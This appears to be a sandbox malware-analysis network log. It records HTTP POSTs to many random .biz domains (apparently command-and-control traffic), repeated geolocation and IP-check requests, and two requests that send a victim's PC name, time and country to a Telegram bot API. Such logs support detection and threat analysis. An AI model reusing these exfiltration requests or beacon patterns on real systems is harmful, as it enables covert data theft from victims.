Source: global traffic	HTTP traffic detected: POST /ipj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /ay HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /gyylxs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /lpjrtgtrcj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /lmfbvinyrxq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /buvxjx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /pjrcxvgcrciphj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /xp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /pfwejjlunhfbci HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /fktafvxejauk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /msbflok HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /mxcqktbjv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /ouxosbeu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /yoeqoxifmyybhvd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /tcvwahikyjxgou HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /rrkpugwxhmi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /xqjf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /ljgqqouxy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /hmjljoygme HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /pabdnlclvrbkpy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /hlrrkh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /kxovwpejbxujie HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /aktkoaqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /gfoywiqg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /fxd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /wwhsdeosr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /stsqeigba HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /polgcwglcl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /qlboy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /ayuhmcm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /vxrwony HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /tknftu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /fqcyfjy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /arya HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /kxri HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /ssxh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /klwkdohmlimacmer HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /kqufyo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /uqgubhowqkworycc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /jllcvkj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
Source: global traffic	HTTP traffic detected: POST /htdxfxsikhflmhhj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
Source: global traffic	HTTP traffic detected: POST /unklgjihfthc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.8:49685 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.8:49724 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:PC-MLN150%0D%0ADate%20and%20Time:%2010/04/2025%20/%2023:15:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20PC-MLN150%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/45.130.83.59 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:PC-MLN150%0D%0ADate%20and%20Time:%2011/04/2025%20/%2009:21:55%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20PC-MLN150%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET /r?usid=27&utid=12022892926 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
Source: global traffic	HTTP traffic detected: GET /ryyftbrdpkr?usid=27&utid=12022893059 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET /ovyjaq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: www.anpmnmxo.biz
Source: global traffic	HTTP traffic detected: GET /ikcoxctprhexiycp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: www.anpmnmxo.biz
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
